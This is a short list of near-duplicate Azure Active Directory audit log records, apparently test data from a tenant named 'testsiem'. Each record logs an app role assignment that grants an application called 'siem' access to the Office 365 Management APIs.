-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"}
